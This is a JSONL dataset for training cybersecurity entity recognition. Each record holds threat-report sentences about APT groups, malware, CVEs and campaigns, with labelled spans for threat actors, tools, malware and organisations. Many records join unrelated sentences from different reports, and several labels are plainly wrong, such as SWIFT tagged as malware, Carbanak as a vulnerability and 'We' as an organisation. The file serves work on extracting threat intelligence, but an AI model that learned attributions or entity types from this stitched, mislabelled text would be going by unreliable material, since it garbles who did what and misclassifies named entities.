{"text": "Talos assesses with high confidence that Group 123 was responsible for six campaigns . These campaign-related VPSs are located in South Africa .", "spans": {"ORGANIZATION: Talos": [[0, 5]], "THREAT_ACTOR: Group 123": [[41, 50]], "TOOL: VPSs": [[110, 114]]}, "info": {"id": "cyberner_stix_train_006941", "source": "cyberner_stix_train"}}
{"text": "Whitefly usually attempts to remain within a targeted organization for long periods of time—often months—in order to steal large volumes of information . This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild .", "spans": {"THREAT_ACTOR: Whitefly": [[0, 8]], "VULNERABILITY: vulnerability": [[159, 172]], "ORGANIZATION: FireEye": [[191, 198]]}, "info": {"id": "cyberner_stix_train_006942", "source": "cyberner_stix_train"}}
{"text": "Sofacy is known for making extensive use of phishing attacks to lure targets into revealing their credentials via realistic reconstruction of internal systems , such as webmails , as employed against the Georgian Ministry of Internal Affairs in the infamous attacks that preceded the Georgian invasion of 2008 .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "ORGANIZATION: Georgian Ministry of Internal Affairs": [[204, 241]]}, "info": {"id": "cyberner_stix_train_006943", "source": "cyberner_stix_train"}}
{"text": "The only sample was found on public repositories and almost seemed to indicate a test run to determine the detection ratio of the sample . LYCEUM deployed this tool via DanBot shortly after gaining initial access to a compromised environment . APT38 , in particular , is strongly distinguishable because of its specific focus on financial institutions and operations that attempt to use SWIFT fraud to steal millions of dollars at a time .", "spans": {"THREAT_ACTOR: LYCEUM": [[139, 145]], "TOOL: DanBot": [[169, 175]], "THREAT_ACTOR: APT38": [[244, 249]], "ORGANIZATION: financial institutions": [[329, 351]], "MALWARE: SWIFT": [[387, 392]]}, "info": {"id": "cyberner_stix_train_006944", "source": "cyberner_stix_train"}}
{"text": "Most devices can be controlled by Xiaomi ’ s “ MiHome ” Android app , which is available on Google Play with between 1,000,000 and 5,000,000 downloads . In 2014 , APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service . In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM ( aka Xagent , aka CHOPSTICK ) , JHUHUGIT ( which is built with code from the Carberp sources ) , AZZY ( aka ADVSTORESHELL , NETUI , EVILTOSS , and spans across 4-5 generations ) and a few others .", "spans": {"ORGANIZATION: Xiaomi": [[34, 40]], "SYSTEM: MiHome": [[47, 53]], "SYSTEM: Android": [[56, 63]], "SYSTEM: Google Play": [[92, 103]], "THREAT_ACTOR: APT41": [[163, 168]], "ORGANIZATION: service provider": [[254, 270]], "ORGANIZATION: payment": [[288, 295]], "ORGANIZATION: service": [[296, 303]], "THREAT_ACTOR: Sofacy group": [[320, 332]], "MALWARE: CORESHELL": [[403, 412]], "MALWARE: SPLM": [[415, 419]], "MALWARE: Xagent": [[426, 432]], "MALWARE: CHOPSTICK": [[439, 448]], "MALWARE: JHUHUGIT": [[453, 461]], "MALWARE: Carberp": [[498, 505]], "MALWARE: AZZY": [[518, 522]], "MALWARE: EVILTOSS": [[553, 561]]}, "info": {"id": "cyberner_stix_train_006945", "source": "cyberner_stix_train"}}
{"text": "Figure 7 . Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time . Umbrella , our secure internet gateway (SIG) , blocks users from connecting to malicious domains , IPs , and URLs , whether users are on or off the corporate network .", "spans": {"MALWARE: CARBANAK": [[91, 99]], "ORGANIZATION: Umbrella": [[150, 158]]}, "info": {"id": "cyberner_stix_train_006946", "source": "cyberner_stix_train"}}
{"text": "It seems that the malware authors produced and delivered malware that only works on specific systems based on previously collected information .", "spans": {}, "info": {"id": "cyberner_stix_train_006947", "source": "cyberner_stix_train"}}
{"text": "In addition , the network beacon traffic for the new malware resembles those used by the CORESHELL backdoor .", "spans": {"MALWARE: CORESHELL backdoor": [[89, 107]]}, "info": {"id": "cyberner_stix_train_006948", "source": "cyberner_stix_train"}}
{"text": "The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802) , and the ability to incorporate them into operations . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: (CVE-2018-0802)": [[62, 77]], "FILEPATH: flare-qdb": [[152, 161]]}, "info": {"id": "cyberner_stix_train_006949", "source": "cyberner_stix_train"}}
{"text": "After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft’s Equation Editor (EQNEDT32) . In the Bahamut report , we discussed two domains found within our search that were linked with a custom Android malware agent .", "spans": {"MALWARE: RTF files": [[52, 61]], "VULNERABILITY: CVE-2018-0798": [[82, 95]], "MALWARE: domains": [[195, 202]], "MALWARE: custom Android malware agent": [[251, 279]]}, "info": {"id": "cyberner_stix_train_006950", "source": "cyberner_stix_train"}}
{"text": "These three macOS installers use a similar post installer script in order to implant a mach-o payload , as well as using the same command-line argument when executing the fetched second-stage payload .", "spans": {"SYSTEM: macOS": [[12, 17]], "TOOL: mach-o": [[87, 93]]}, "info": {"id": "cyberner_stix_train_006951", "source": "cyberner_stix_train"}}
{"text": "According to the build path ( Z:\\Loader\\x64\\Release\\WinloaderExe.pdb ) , the malware author called this malware a loader .", "spans": {}, "info": {"id": "cyberner_stix_train_006952", "source": "cyberner_stix_train"}}
{"text": "The dropper and the payload are quite similar to the previous versions but the author modified some public information such as MUTEX name , obfuscation .", "spans": {}, "info": {"id": "cyberner_stix_train_006953", "source": "cyberner_stix_train"}}
{"text": "This campaign , like later CozyDuke campaigns , began with spear-phishing emails that tried to impersonate commonly seen spam emails .", "spans": {"MALWARE: CozyDuke": [[27, 35]], "TOOL: emails": [[74, 80], [126, 132]]}, "info": {"id": "cyberner_stix_train_006954", "source": "cyberner_stix_train"}}
{"text": "The decompile method is based on the fact that Android applications are Java-based , meaning it is possible to recompile it . As noted in our previous blog on Buhtrap , this gang has been actively targeting Russian businesses , mostly through spear-phishing . The installer downloads an MSI package from one of the two URLs , and then launches msiexec.exe to perform a silent install . As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": {"SYSTEM: Android": [[47, 54]], "ORGANIZATION: businesses": [[215, 225]], "TOOL: MSI": [[287, 290]], "FILEPATH: msiexec.exe": [[344, 355]], "TOOL: Cobalt Strike": [[577, 590]], "TOOL: Mimikatz": [[594, 602]]}, "info": {"id": "cyberner_stix_train_006955", "source": "cyberner_stix_train"}}
{"text": "The table below shows the commands available to the operator for tasking on infected devices . The attack leveraged malware we called ' BlackLambert ' , which was used to target a high profile organization in Europe . The attackers primarily use malicious .PDF files that exploit vulnerabilities in Adobe Reader , Acrobat , and Flash Player , including the use of two zero-day exploits—one in 2009 and another in 2011 . Our gathered field data shows the following statistics on CSP usage across the Internet ( based on HTTPArchive March 2020 scan ):", "spans": {"TOOL: BlackLambert": [[136, 148]], "ORGANIZATION: high profile organization": [[180, 205]], "FILEPATH: .PDF": [[256, 260]], "TOOL: Adobe Reader": [[299, 311]], "TOOL: Acrobat": [[314, 321]], "TOOL: Flash Player": [[328, 340]], "VULNERABILITY: zero-day": [[368, 376]], "ORGANIZATION: CSP": [[478, 481]]}, "info": {"id": "cyberner_stix_train_006956", "source": "cyberner_stix_train"}}
{"text": "If the system is deemed interesting , the next stage malware would be delivered into corresponding directories .", "spans": {}, "info": {"id": "cyberner_stix_train_006957", "source": "cyberner_stix_train"}}
{"text": "The hook gets windows messages indicating when a network drive has been attached .", "spans": {"SYSTEM: windows": [[14, 21]]}, "info": {"id": "cyberner_stix_train_006958", "source": "cyberner_stix_train"}}
{"text": "One chunk contains the entire malware DLL code ( without PE headers ) . This cyber-espionage group was dubbed ' Rocket Kitten ' , and remains active as of this writing , with reported attacks as recent as October 2015 . The final payload comes in a form of a launcher DLL that contains an encrypted backdoor in its .rdata section and a plain-text configuration in its resources . Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers , plus he 's accused of making ransom demands through deploying ransomware .", "spans": {"THREAT_ACTOR: cyber-espionage group": [[77, 98]], "THREAT_ACTOR: Rocket Kitten": [[112, 125]], "TOOL: DLL": [[268, 271]], "ORGANIZATION: Astamirov": [[380, 389]]}, "info": {"id": "cyberner_stix_train_006959", "source": "cyberner_stix_train"}}
{"text": "This opens the door to , for example , fully controlling the victim ’ s bank account . This campaign used the abovementioned .html file , malicious Excel/Word document VBA macro , the FlawedAmmyy payload , and Amadey . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets financial organizations .", "spans": {"TOOL: macro": [[172, 177]], "TOOL: FlawedAmmyy payload": [[184, 203]], "TOOL: Amadey": [[210, 216]], "THREAT_ACTOR: Lazarus": [[263, 270]], "TOOL: emails": [[291, 297]], "ORGANIZATION: financial organizations": [[348, 371]]}, "info": {"id": "cyberner_stix_train_006960", "source": "cyberner_stix_train"}}
{"text": "To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . OSX Malware Linked to Operation Emmental Hijacks User Network Traffic .", "spans": {"MALWARE: SWAnalytics": [[50, 61]], "SYSTEM: OSX": [[160, 163]], "MALWARE: Malware": [[164, 171]]}, "info": {"id": "cyberner_stix_train_006961", "source": "cyberner_stix_train"}}
{"text": "After successful installation , tap Open and enable the device administrator . We believe that the Sea Turtle campaign continues to be highly successful for several reasons . APT37 has also been linked to following campaigns between 2016-2018 : Operation Daybreak , Operation Erebus , Golden Time , Evil New Year , Are you Happy? , FreeMilk , Northern Korean Human Rights , and Evil New Year 2018 .", "spans": {"ORGANIZATION: We": [[79, 81]], "THREAT_ACTOR: APT37": [[175, 180]]}, "info": {"id": "cyberner_stix_train_006962", "source": "cyberner_stix_train"}}
{"text": "Once in their possession , the actors use these compromised payment card credentials to generate further card information . APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan .", "spans": {"THREAT_ACTOR: actors": [[31, 37]], "THREAT_ACTOR: APT threat actors": [[124, 141]], "ORGANIZATION: diplomat": [[192, 200]]}, "info": {"id": "cyberner_stix_train_006963", "source": "cyberner_stix_train"}}
{"text": "Appendix Samples Some of the latest Cerberus samples found in the wild : App name Package name SHA 256 hash Flash Player com.uxlgtsvfdc.zipvwntdy 728a6ea44aab94a2d0ebbccbf0c1b4a93fbd9efa8813c19a88d368d6a46b4f4f Flash Player com.ognbsfhszj.hqpquokjdp fe28aba6a942b6713d7142117afdf70f5e731c56eff8956ecdb40cdc28c7c329 The SectorJ04 group , which has been utilizing the same pattern of infection and the same malware for more than six months , is believed to be attempting to change its infection methods such as downloading malware directly from malicious documents without using MSI installation files , changing their spam email format and using new types of backdoor . BRONZE BUTLER compromises organizations to conduct cyberespionage , primarily focusing on Japan .", "spans": {"MALWARE: Cerberus": [[36, 44]], "SYSTEM: Flash Player": [[108, 120], [211, 223]], "THREAT_ACTOR: SectorJ04": [[319, 328]], "THREAT_ACTOR: BRONZE BUTLER": [[669, 682]], "THREAT_ACTOR: cyberespionage": [[720, 734]]}, "info": {"id": "cyberner_stix_train_006964", "source": "cyberner_stix_train"}}
{"text": "The overarching campaign appears to target both Chinese nationals within different industries and government agencies in Southern Asia . This threat report gives insight into some of the information that Fox-IT has about a threat actor that it follows , called Mofang .", "spans": {"ORGANIZATION: government agencies": [[98, 117]], "ORGANIZATION: Fox-IT": [[204, 210]], "THREAT_ACTOR: Mofang": [[261, 267]]}, "info": {"id": "cyberner_stix_train_006965", "source": "cyberner_stix_train"}}
{"text": "In addition to the following step-by-step process illustrates how Cannon communicates with the actor-controlled C2 email address to obtain a secondary payload .", "spans": {"MALWARE: Cannon": [[66, 72]], "TOOL: C2": [[112, 114]], "TOOL: email": [[115, 120]]}, "info": {"id": "cyberner_stix_train_006966", "source": "cyberner_stix_train"}}
{"text": "Dropping Elephant ( also known as \" Chinastrats \" and \" Patchwork \" ) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools . These operations involved highly targeted email lures with repurposed content and attachments that contained an updated version of KeyBoy .", "spans": {"THREAT_ACTOR: Dropping Elephant": [[0, 17]], "THREAT_ACTOR: Chinastrats": [[36, 47]], "THREAT_ACTOR: Patchwork": [[56, 65]], "THREAT_ACTOR: threat actor": [[90, 102]], "ORGANIZATION: diplomatic": [[147, 157]], "ORGANIZATION: economic": [[162, 170]], "MALWARE: email lures": [[258, 269]], "MALWARE: KeyBoy": [[347, 353]]}, "info": {"id": "cyberner_stix_train_006967", "source": "cyberner_stix_train"}}
{"text": "Sensitive bank documents have be found on the servers that were controlling Carbanak . this attack against a Kaspersky Lab user on August 5 , 2014 .", "spans": {"VULNERABILITY: Carbanak": [[76, 84]], "ORGANIZATION: Kaspersky Lab": [[109, 122]]}, "info": {"id": "cyberner_stix_train_006968", "source": "cyberner_stix_train"}}
{"text": "The credentials they use to register their malware infrastructure are easily associated with their public social media accounts on Google® , Facebook® , MySpace® , Instagram® , and various dating and blogging sites . VAMP targeted various types of data from the phones of victims : images , text messages , contacts , and call history , among others .", "spans": {"ORGANIZATION: social media": [[106, 118]], "ORGANIZATION: Google®": [[131, 138]], "ORGANIZATION: Facebook®": [[141, 150]], "ORGANIZATION: MySpace®": [[153, 161]], "ORGANIZATION: Instagram®": [[164, 174]], "ORGANIZATION: dating and blogging sites": [[189, 214]], "MALWARE: VAMP": [[217, 221]]}, "info": {"id": "cyberner_stix_train_006970", "source": "cyberner_stix_train"}}
{"text": "The use of weaponized legitimate documents is a longstanding operational standard of Patchwork . It is highly likely that the Mofang group is a group that operates out of China and is probably government-affiliated .", "spans": {"TOOL: weaponized legitimate documents": [[11, 42]], "THREAT_ACTOR: Patchwork": [[85, 94]], "THREAT_ACTOR: Mofang group": [[126, 138]]}, "info": {"id": "cyberner_stix_train_006971", "source": "cyberner_stix_train"}}
{"text": "Data was always sent to the C & C server via HTTP in the body of a POST request in encrypted form to the relative address /something/index.php . CTU researchers have evidence that the threat group compromised U.S and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations . These new samples targeted Linux- and Unix-based operating systems , vulnerable servers , and internet of things ( IoT ) devices by exploiting known vulnerabilities with available exploits . The customers of these commercial spyware organizations know who their victim(s ) are .", "spans": {"ORGANIZATION: CTU": [[145, 148]], "ORGANIZATION: manufacturing": [[263, 276]], "ORGANIZATION: aerospace": [[292, 301]], "ORGANIZATION: defense contractors": [[314, 333]], "ORGANIZATION: automotive": [[338, 348]], "ORGANIZATION: technology": [[351, 361]], "ORGANIZATION: energy": [[364, 370]], "ORGANIZATION: pharmaceuticals": [[377, 392]], "ORGANIZATION: education": [[397, 406]], "ORGANIZATION: legal": [[413, 418]], "SYSTEM: Linux-": [[510, 516]], "SYSTEM: Unix-based operating systems": [[521, 549]]}, "info": {"id": "cyberner_stix_train_006972", "source": "cyberner_stix_train"}}
{"text": "After downloading and unpacking , the main module executes the exploit binary file . The dropped PE file has the distinctive file name 8.t” . Tropic Trooper focuses on targeting government , healthcare , transportation , and high-tech industries and has been active since 2011 .", "spans": {"TOOL: PE": [[97, 99]], "MALWARE: 8.t”": [[135, 139]], "THREAT_ACTOR: Tropic Trooper": [[142, 156]], "ORGANIZATION: government": [[178, 188]]}, "info": {"id": "cyberner_stix_train_006973", "source": "cyberner_stix_train"}}
{"text": "Claudio Guarnieri , a security researcher who has investigated Hacking Team along with others at the Citizen Lab , was quick to point this out . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets .", "spans": {"ORGANIZATION: Claudio Guarnieri": [[0, 17]], "ORGANIZATION: Citizen Lab": [[101, 112]], "THREAT_ACTOR: ScarCruft": [[194, 203]], "VULNERABILITY: zero-day": [[237, 245]]}, "info": {"id": "cyberner_stix_train_006974", "source": "cyberner_stix_train"}}
{"text": "Microsoft reiterates that the PLATINUM tool does not expose flaws in Intel® Active Management Technology ( AMT ) , but uses the technology within an already compromised network to evade security monitoring tools . Attackers are sending malicious PDF and DOC files , which use exploits to drop variants of Backdoor.Sogu .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "THREAT_ACTOR: PLATINUM": [[30, 38]], "TOOL: Intel® Active Management Technology": [[69, 104]], "TOOL: AMT": [[107, 110]], "MALWARE: PDF": [[246, 249]], "MALWARE: DOC files": [[254, 263]], "MALWARE: Backdoor.Sogu": [[305, 318]]}, "info": {"id": "cyberner_stix_train_006975", "source": "cyberner_stix_train"}}
{"text": "] infogooogel-drive [ . Considering the language being used in the malicious code is Arabic , it seems that the attacker is familiar with Arabic language as well . This saves the intruder from having to manually edit webpages . Adversaries may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"THREAT_ACTOR: Adversaries": [[228, 239]]}, "info": {"id": "cyberner_stix_train_006976", "source": "cyberner_stix_train"}}
{"text": "This section contains network signatures and host-based rules that can be used to detect malicious activity associated with HIDDEN COBRA actors .", "spans": {"TOOL: network signatures": [[22, 40]], "TOOL: host-based rules": [[45, 61]], "THREAT_ACTOR: HIDDEN COBRA": [[124, 136]]}, "info": {"id": "cyberner_stix_train_006977", "source": "cyberner_stix_train"}}
{"text": "Windows 10 S devices are naturally protected against FinFisher and other threats thanks to the strong code integrity policies that don ’ t allow unknown unsigned binaries to run ( thus stopping FinFisher ’ s PE installer ) or loaded ( blocking FinFisher ’ s DLL persistence ) . menuPass is an ongoing APT campaign with a broad range of targets and will likely continue to target Japan in the future . OceanLotus : 0 config varies content is read from resource P1/1 . In one of our previous blog entries , we covered how the threat actor known as Winnti was using GitHub to spread malware – a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming , pharmaceutical , and telecommunications companies .", "spans": {"SYSTEM: Windows 10": [[0, 10]], "MALWARE: FinFisher": [[53, 62], [194, 203], [244, 253]], "THREAT_ACTOR: OceanLotus": [[401, 411]], "THREAT_ACTOR: threat actor": [[524, 536]], "THREAT_ACTOR: Winnti": [[546, 552]], "THREAT_ACTOR: the group": [[619, 628]], "ORGANIZATION: gaming , pharmaceutical , and telecommunications companies": [[743, 801]]}, "info": {"id": "cyberner_stix_train_006978", "source": "cyberner_stix_train"}}
{"text": "These devices were located in the following countries : How we protect you To protect Android devices and users , Google Play provides a complete set of security services that update outside of platform releases . Symantec identified two strains of custom malware used by the Leafminer group : Trojan.Imecab and Backdoor.Sorgu . Given that these attacks were mostly targeted against Asia and the gaming industry , it shouldn’t be surprising they are the work of the group described in Kaspersky ’s “ Winnti – More than just a game ” . Geographically , most victims are located in Europe , specifically Italy .", "spans": {"SYSTEM: Android": [[86, 93]], "SYSTEM: Google Play": [[114, 125]], "ORGANIZATION: Symantec": [[214, 222]], "THREAT_ACTOR: Leafminer group": [[276, 291]], "TOOL: Trojan.Imecab": [[294, 307]], "TOOL: Backdoor.Sorgu": [[312, 326]], "ORGANIZATION: Kaspersky": [[485, 494]], "THREAT_ACTOR: Winnti": [[500, 506]]}, "info": {"id": "cyberner_stix_train_006979", "source": "cyberner_stix_train"}}
{"text": "The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . In October 2015 , the Callisto Group was observed sending targeted credential phishing emails .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: financial": [[38, 47]], "ORGANIZATION: policy organizations": [[52, 72]], "ORGANIZATION: audiences": [[161, 170]], "THREAT_ACTOR: Callisto Group": [[195, 209]], "TOOL: emails": [[260, 266]]}, "info": {"id": "cyberner_stix_train_006980", "source": "cyberner_stix_train"}}
{"text": "The domain go-microstf.com was originally set up to spoof Google Analytics login page .", "spans": {"DOMAIN: go-microstf.com": [[11, 26]], "TOOL: Google Analytics": [[58, 74]]}, "info": {"id": "cyberner_stix_train_006981", "source": "cyberner_stix_train"}}
{"text": "After compromising a system , typically by installing Powermud or Powemuddy , Seedworm first runs a tool that steals passwords saved in users ' web browsers and email , demonstrating that access to the victim 's email , social media , and chat accounts is one of their likely goals . Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow , lending some further support to the scenario that CNIIHM , a Russian research organization in Moscow , has been involved in TEMP.Veles activity .", "spans": {"TOOL: Powermud": [[54, 62]], "TOOL: Powemuddy": [[66, 75]], "THREAT_ACTOR: Seedworm": [[78, 86]], "THREAT_ACTOR: TEMP.Veles": [[335, 345], [502, 512]], "THREAT_ACTOR: CNIIHM": [[428, 434]], "ORGANIZATION: research organization": [[447, 468]]}, "info": {"id": "cyberner_stix_train_006982", "source": "cyberner_stix_train"}}
{"text": "The first version of Proyecto RAT” was published at the end of 2010 . We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post .", "spans": {"MALWARE: Proyecto RAT”": [[21, 34]], "THREAT_ACTOR: Bahamut": [[143, 150]], "FILEPATH: Devoted To Humanity": [[166, 185]], "TOOL: C2": [[221, 223]]}, "info": {"id": "cyberner_stix_train_006984", "source": "cyberner_stix_train"}}
{"text": "In all of these cases , we operate under strict confidentiality rules with our customers and cannot reveal publicly any information about these attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_006985", "source": "cyberner_stix_train"}}
{"text": "FANCY BEAR adversary used different tradecraft , deploying X-Agent malware with capabilities to do remote command execution , file transmission and keylogging .", "spans": {"THREAT_ACTOR: FANCY BEAR": [[0, 10]], "MALWARE: X-Agent": [[59, 66]]}, "info": {"id": "cyberner_stix_train_006986", "source": "cyberner_stix_train"}}
{"text": "These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android , or the patches were never installed by the user . A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . We also observed a pattern that was also using an 8-bit portion of the register . Depending on the campaign , the final payload or the third intermediate stage is appended as an encrypted binary blob to the end of the image .", "spans": {"SYSTEM: Android": [[128, 135]], "THREAT_ACTOR: BlackOasis group": [[218, 234]], "THREAT_ACTOR: hackers": [[253, 260]], "VULNERABILITY: zero-day exploit": [[304, 320]], "THREAT_ACTOR: Gamma Group": [[446, 457]]}, "info": {"id": "cyberner_stix_train_006987", "source": "cyberner_stix_train"}}
{"text": "Talos said the perpetrators of DNSpionage were able to steal email and other login credentials from a number of government and private sector entities in Lebanon and the United Arab Emirates by hijacking the DNS servers for these targets , so that all email and virtual private networking ( VPN ) traffic was redirected to an Internet address controlled by the attackers . CTU researchers have observed the threat actors installing a credential logger and backdoor on Microsoft Exchange servers , which requires a technical grasp of Internet Information Services ( IIS ) .", "spans": {"ORGANIZATION: Talos": [[0, 5]], "ORGANIZATION: government": [[112, 122]], "TOOL: VPN": [[291, 294]], "ORGANIZATION: CTU": [[373, 376]], "MALWARE: credential logger": [[434, 451]], "ORGANIZATION: Microsoft": [[468, 477]], "TOOL: Internet Information Services": [[533, 562]], "TOOL: IIS": [[565, 568]]}, "info": {"id": "cyberner_stix_train_006988", "source": "cyberner_stix_train"}}
{"text": "The stolen data fields are : Mobile - The infected device phone number Machine - The device model ( in our example : Google Pixel 2 ) Sversion - The OS version Bank - Checks if there are any banking-related or cryptocurrency trading apps Provider - The telecommunication provider ( IMSI value in device settings ) npki - Checks if the folder named NPKI ( National Public Key Infrastructure ) might contain authentication certificates related to financial transactions onStartCommand function for stealing device information and additional sensitive data . The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . Each attack comprises a variety of phases , including reconnaissance , exploitation , command and control , lateral movement , and Exfiltration .", "spans": {"SYSTEM: Google Pixel 2": [[117, 131]], "THREAT_ACTOR: Emissary Panda": [[560, 574]], "TOOL: China Chopper": [[599, 612]], "VULNERABILITY: CVE-2019-0604": [[820, 833]]}, "info": {"id": "cyberner_stix_train_006989", "source": "cyberner_stix_train"}}
{"text": "In the past year , FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper , which we detect as RUHAPPY . CraP2P has frequently been used to distribute other malware such as Locky and Dridex , but also supported large scale spam campaigns for dating advertisement and pump-and-dump scams after the demise of Kelihos .", "spans": {"ORGANIZATION: FireEye iSIGHT": [[19, 33]], "THREAT_ACTOR: TEMP.Reaper": [[110, 121]], "FILEPATH: CraP2P": [[153, 159]], "MALWARE: Locky": [[221, 226]], "MALWARE: Dridex": [[231, 237]]}, "info": {"id": "cyberner_stix_train_006990", "source": "cyberner_stix_train"}}
{"text": "If the argument -SSL is given through command-line to the artifact , these beacons will be encapsulated in an SSL connection and a proper TLS handshake will be initiated with the C&C .", "spans": {"TOOL: C&C": [[179, 182]]}, "info": {"id": "cyberner_stix_train_006991", "source": "cyberner_stix_train"}}
{"text": "These PDFs would attempt to silently infect the recipient with MiniDuke , while distracting them by displaying a decoy document .", "spans": {"TOOL: PDFs": [[6, 10]], "MALWARE: MiniDuke": [[63, 71]]}, "info": {"id": "cyberner_stix_train_006992", "source": "cyberner_stix_train"}}
{"text": "CTU researchers assess with high confidence that threat groups like TG-1314 will continue to live off of the land to avoid detection and conduct their operations .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "ORGANIZATION: TG-1314": [[68, 75]]}, "info": {"id": "cyberner_stix_train_006993", "source": "cyberner_stix_train"}}
{"text": "The actor attempts to exploit CVE-2018–8440 — an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit . The China-backed Barium APT is suspected to be at the helm of the project .", "spans": {"THREAT_ACTOR: actor": [[4, 9]], "VULNERABILITY: CVE-2018–8440": [[30, 43]], "VULNERABILITY: vulnerability": [[72, 85]], "VULNERABILITY: proof-of-concept": [[208, 224]], "VULNERABILITY: exploit": [[225, 232]], "THREAT_ACTOR: Barium": [[252, 258]]}, "info": {"id": "cyberner_stix_train_006994", "source": "cyberner_stix_train"}}
{"text": "Eventually , the screen PIN preferences will be saved to an additional XML file in the shared preferences folder . The dropped PE file has the distinctive file name 8.t” . Between December 28 , 2016 and January 1 , 2017 , CTU researchers observed a phishing campaign targeting Middle Eastern organizations .", "spans": {"TOOL: PE": [[127, 129]], "MALWARE: 8.t”": [[165, 169]], "ORGANIZATION: CTU": [[222, 225]]}, "info": {"id": "cyberner_stix_train_006995", "source": "cyberner_stix_train"}}
{"text": "Our investigation of APT28 ’s compromise of WADA ’s network , and our observations of the surrounding events reveal how Russia sought to counteract a damaging narrative and delegitimize the institutions leveling criticism .", "spans": {"THREAT_ACTOR: APT28": [[21, 26]], "ORGANIZATION: WADA": [[44, 48]]}, "info": {"id": "cyberner_stix_train_006996", "source": "cyberner_stix_train"}}
{"text": "This subset of SPLM / CHOPSTICK activity leads into several small surprises that take us into 2018 , to be discussed in further detail at SAS 2018 .", "spans": {"MALWARE: SPLM": [[15, 19]], "MALWARE: CHOPSTICK": [[22, 31]], "ORGANIZATION: SAS": [[138, 141]]}, "info": {"id": "cyberner_stix_train_006997", "source": "cyberner_stix_train"}}
{"text": "They are believed to have successfully attacked the Ministries of Internal and Foreign Affairs of several ex-Soviet countries , as well as Eastern European governments and military institutions , and NATO and the White House .", "spans": {"ORGANIZATION: Ministries of Internal": [[52, 74]], "ORGANIZATION: Foreign Affairs": [[79, 94]], "ORGANIZATION: NATO": [[200, 204]], "ORGANIZATION: White House": [[213, 224]]}, "info": {"id": "cyberner_stix_train_006998", "source": "cyberner_stix_train"}}
{"text": "Skype ; 3rd party stores only Most of these apps are well established and available on Google Play , however , com.skype.rover appears to be available only on third-party app stores . In these instances , APT41 leveraged TeamViewer to transfer malware into the compromised environment , although we do not have direct evidence of APT41 compromising TeamViewer . As researchers continued discovering new toolsets that were created and used by the same group that had been operating MiniDuke , and thus the threat actor operating the toolsets started to be commonly referred to as \" Dukes \" .", "spans": {"SYSTEM: Skype": [[0, 5]], "SYSTEM: Google Play": [[87, 98]], "THREAT_ACTOR: APT41": [[205, 210], [330, 335]], "TOOL: TeamViewer": [[221, 231]], "MALWARE: MiniDuke": [[481, 489]], "THREAT_ACTOR: Dukes": [[581, 586]]}, "info": {"id": "cyberner_stix_train_006999", "source": "cyberner_stix_train"}}
{"text": "During our analysis , the C2 server provided a secondary payload that functionally appeared similar to the initial Zebrocy sample .", "spans": {"TOOL: C2": [[26, 28]], "MALWARE: Zebrocy": [[115, 122]]}, "info": {"id": "cyberner_stix_train_007000", "source": "cyberner_stix_train"}}
{"text": "Chinese language traces in the code : During the investigation , the Cybereason Nocturnus team discovered code artifacts that may indicate Chinese threat actors . FIN7 thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . Coincidentally , following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare , we have found evidence of very recent activity by a group referred to as APT15 , known for committing cyber espionage which is believed to be affiliated with the Chinese government .", "spans": {"ORGANIZATION: Cybereason Nocturnus": [[69, 89]], "THREAT_ACTOR: FIN7": [[163, 167]], "ORGANIZATION: Navy": [[353, 357]], "THREAT_ACTOR: APT15": [[500, 505]], "THREAT_ACTOR: cyber espionage": [[529, 544]]}, "info": {"id": "cyberner_stix_train_007001", "source": "cyberner_stix_train"}}
{"text": "If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques .", "spans": {"MALWARE: bot": [[5, 8]], "FILEPATH: UMBRAGE": [[149, 156]]}, "info": {"id": "cyberner_stix_train_007002", "source": "cyberner_stix_train"}}
